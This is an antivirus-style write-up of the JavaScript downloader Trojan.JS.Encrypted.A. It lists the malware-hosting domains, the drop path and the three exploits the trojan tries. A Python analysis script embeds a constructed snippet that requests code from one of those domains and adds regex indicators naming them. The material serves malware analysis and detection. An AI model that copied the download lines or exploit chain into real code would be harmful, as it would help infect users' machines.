Trojan.JS.Encrypted.A
First posted on 21 November 2011.
Source: BitDefender
Aliases:
There are no other names known for Trojan.JS.Encrypted.A.
Explanation:
The JavaScript contains several layers of encrypted data and downloads other pieces of malware.
It tries different approaches to download a malicious file.
The downloads occur from the following sites: http://fconnorlaw.cn, http://biztech-co.cn, http://ratedhot.cn or http://pacoast.cn (most of which are former malware-hosting sites, e.g. for Trojan.Peed). It saves the file under the path ".//..//[random_name].exe" and executes it on the infected computer.
The interesting thing about the flow of this script is its thorough chain of execution:
It has a few layers of encryption and, of course, code obfuscation (variable names, indentation).
After decoding, a clear and simple pattern emerges: one of the resulting scripts starts with a call to the main function, "startCrControlRange", and every function ends with the following code: setTimeout([next function in flow], 2000); this means that the next function is executed 2 seconds after the current one ends. The other script performs a simple download using "msxml2.xmlhttp" from the sites mentioned above.
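Once the layers are decoded, the hand-off chain can be recovered mechanically. The Python below is an added example, not part of the BitDefender write-up: it follows the setTimeout(next, ms) calls from startCrControlRange to rebuild the execution order and flags the indicators named above (msxml2.xmlhttp, the ".//..//" drop path, the listed domains). The embedded script is a constructed stand-in with invented function bodies, not the real sample.

```python
import re

# Constructed stand-in for one decoded layer (only startCrControlRange is a real name).
SAMPLE = r'''
function startCrControlRange() { var s = 1; setTimeout(fetchPayload, 2000); }
function fetchPayload() { var x = new ActiveXObject("msxml2.xmlhttp"); x.open("GET", "http://fconnorlaw.cn/" + s, false); setTimeout(writePayload, 2000); }
function writePayload() { var p = ".//..//" + s + ".exe"; setTimeout(launchPayload, 2000); }
function launchPayload() { return p; }
'''

FUNC_RE = re.compile(r'function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{')
TIMEOUT_RE = re.compile(r'setTimeout\(\s*([A-Za-z_$][\w$]*)\s*,\s*(\d+)\s*\)')

# Static indicators taken from the write-up (domains are the ones it lists).
INDICATORS = {
    "xmlhttp": re.compile(r'msxml2\.xmlhttp', re.I),
    "drop_path": re.compile(r'\.//\.\.//'),
    "known_domain": re.compile(r'https?://(?:fconnorlaw|biztech-co|ratedhot|pacoast)\.cn', re.I),
}


def parse_functions(script):
    """Map each named function to its brace-matched body (braces inside strings are not handled)."""
    funcs = {}
    for m in FUNC_RE.finditer(script):
        depth, i = 1, m.end()
        while i < len(script) and depth:
            depth += {"{": 1, "}": -1}.get(script[i], 0)
            i += 1
        funcs[m.group(1)] = script[m.end():i - 1]
    return funcs


def reconstruct_chain(script, entry):
    """Return [(function, delay_ms)] in execution order, following the last setTimeout in each body."""
    funcs = parse_functions(script)
    chain, seen, name, delay = [], set(), entry, 0
    while name in funcs and name not in seen:  # stop on unknown target or a loop
        seen.add(name)
        chain.append((name, delay))
        hops = TIMEOUT_RE.findall(funcs[name])
        if not hops:
            break
        name, delay = hops[-1][0], int(hops[-1][1])
    return chain


def find_indicators(script):
    """Sorted names of the write-up's indicators present in the decoded script."""
    return sorted(k for k, rx in INDICATORS.items() if rx.search(script))


if __name__ == "__main__":
    for fn, ms in reconstruct_chain(SAMPLE, "startCrControlRange"):
        print(f"+{ms:>5} ms  {fn}")
    print("indicators:", find_indicators(SAMPLE))
```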
It uses an exploit so that encrypted shellcode is executed. The shellcode used by the exploit is 0x1BB bytes long and downloads a file from one of the infected sites. It tries one of these exploits in order to execute its shellcode:
"Microsoft Internet Explorer WebViewFolderIcon setSlice()" exploit
"NCTAudioFile2 ActiveX control" buffer overflow through the "SetFormatLikeSample" function
Exploit for RealPlayer using the console property
Last update: 21 November 2011